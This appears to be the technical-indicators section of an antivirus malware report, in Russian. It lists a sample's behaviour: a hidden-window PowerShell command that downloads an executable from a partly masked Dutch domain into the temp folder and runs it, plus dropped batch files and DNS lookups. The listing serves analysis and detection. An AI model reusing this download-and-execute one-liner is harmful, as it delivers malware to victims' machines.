Техническая информация
- $itmdgzn как %temp%\qwdtk3.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yyanyd7([String] $Itmdgzn){(New-Object System.Net.WebClient).DownloadFile($Itmdgzn,''%TMP%\Qwdtk3.exe'');Start-Process ''%TMP%\Qwdtk3.exe'';}try{yyanyd7(''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
- %TEMP%\dp-ontxu.bat
- %TEMP%\934570.cvr
- 'de####gaanzee.nl':80
- http://de####gaanzee.nl/kagasio.png
- DNS ASK hi###vonelm.de
- DNS ASK de####gaanzee.nl
- DNS ASK de#######appij.nlkagasio.png
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yyanyd7([String] $Itmdgzn){(New-Object System.Net.WebClient).DownloadFile($Itmdgzn,''%TMP%\Qwdtk3.exe'');Start-Process ''%TMP%\Qwdtk3.exe'';}try{yyanyd7(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\dp-ontxu.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\dp-ontxu.bat" "